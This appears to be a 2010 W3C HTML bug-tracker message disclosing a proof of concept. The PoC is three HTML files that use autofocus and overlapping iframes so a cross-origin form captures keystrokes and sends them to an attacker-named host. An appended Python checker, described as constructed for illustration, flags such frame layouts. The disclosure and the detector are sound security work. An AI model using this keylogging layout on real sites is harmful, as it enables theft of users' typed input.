
[Bug 9602] That autofocus attribute will wreak security havoc. What an ignorant idea to bring more logic to HTML. I think I know a couple of ways to abuse it, since it actually is some sort of flow control, which only scripting languages should be capable of. I hope

From: <bugzilla@jessica.w3.org>
Date: Wed, 28 Apr 2010 15:49:29 +0000
To: public-html-bugzilla@w3.org
Message-Id: <E1O79Vx-0004K6-23@jessica.w3.org>
http://www.w3.org/Bugs/Public/show_bug.cgi?id=9602


Skyphire <sasha@scarletred.nl> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
                 CC|                            |sasha@scarletred.nl




--- Comment #1 from Skyphire <sasha@scarletred.nl>  2010-04-28 15:50:08 ---
Scriptless keylog primer PoC.

It still requires an ENTER key event, but we might be able to bubble focus
through the FOR attribute to get even more flow control. Granted, this was
possible with JavaScript enabled before, but never without JavaScript since
there was no way to get focus from flow control from another domain, until now.
This is only an example of what autofocus can be capable of. I am sure more
elegant attacks are possible, given the time to think them up.  

!!Legitform.html (on trusted domain)

<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Scriptless keylog primer</title>
</head>
<body>
<form name="logo" method="post" action="http://www.google.com">
<input type="text" name="log">
<input type="submit" name="submit" value="submit">
</form>
</body>
</html>

!!Keylog.html (on untrusted domain)

<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Scriptless keylog primer</title>
</head>
<body>
<form name="logo" method="GET" action="http://www.scriptkiddie.universe.com">
<input type="text" name="log" autofocus> <!-- Due to autofocus, Frame F2 gets
the focus. Even when it's below Frame F1! -->
<input type="submit" name="submit" value="submit">
</form>
</body>
</html>


!!Test.html (on trusted domain, possibly injected/stored reflected XSS or
simply from unsanitized code)

<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Scriptless keylog primer</title>
</head>
<body>

<!-- This is only to watch what exactly happens, irl we set Frame F2 with a
fixed top position of about 19px/20px to let Frame F1 overlap Frame F2 -->
<iframe name="F1" src="legitform.html" style="position:absolute; top:18px;
left:90px; z-index:3; height:25px; background-color:cyan;" scrolling="no">
</iframe>

<iframe name="F2" src="keylog.html" style="position:absolute; top:50px; left:90px;
z-index:2; height:25px; background-color:magenta;" scrolling="no">
</iframe>

</body>
</html>


-Skyphire.

Received on Wednesday, 28 April 2010 15:50:13 GMT
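
A static check for the frame layout described in the message above, added here as an example; it is not part of the original report or of any W3C code. It flags cross-origin iframes whose document contains an autofocus form control, and notes whether the embedding page sandboxes the frame. The hostnames (trusted.example, untrusted.example, collector.example), the names Scan and audit, and the sample documents are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample documents mirroring the frame layout in the report.
HOST = "http://trusted.example/test.html"
PAGES = {
    HOST: '<iframe name="F1" src="legitform.html"></iframe>'
          '<iframe name="F2" src="http://untrusted.example/keylog.html"></iframe>',
    "http://untrusted.example/keylog.html":
        '<form method="GET" action="http://collector.example/">'
        '<input type="text" name="log" autofocus></form>',
}

def origin(url):
    u = urlsplit(url)
    return (u.scheme, u.hostname, u.port)

class Scan(HTMLParser):
    """Collects iframes, and autofocus controls with their form's action."""
    def __init__(self):
        super().__init__()
        self.iframes, self.autofocus, self.action = [], [], None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            self.iframes.append(a)
        elif tag == "form":
            self.action = a.get("action") or ""
        elif tag in ("input", "textarea", "select", "button") and "autofocus" in a:
            self.autofocus.append((a.get("name"), self.action))
    def handle_endtag(self, tag):
        if tag == "form":
            self.action = None

def audit(host_url, pages):
    """Report cross-origin frames whose content asks for focus on load."""
    host = Scan(); host.feed(pages[host_url])
    findings = []
    for fr in host.iframes:
        src = urljoin(host_url, fr.get("src") or "")
        if origin(src) == origin(host_url) or src not in pages:
            continue  # same-origin frame, or framed document not supplied
        # sandbox without allow-scripts blocks automatic focusing (HTML sandboxing flags)
        blocked = "sandbox" in fr and "allow-scripts" not in (fr["sandbox"] or "").split()
        child = Scan(); child.feed(pages[src])
        for name, action in child.autofocus:
            findings.append({"frame": fr.get("name"), "field": name, "blocked": blocked,
                             "posts_to": urljoin(src, action or "")})
    return findings
```
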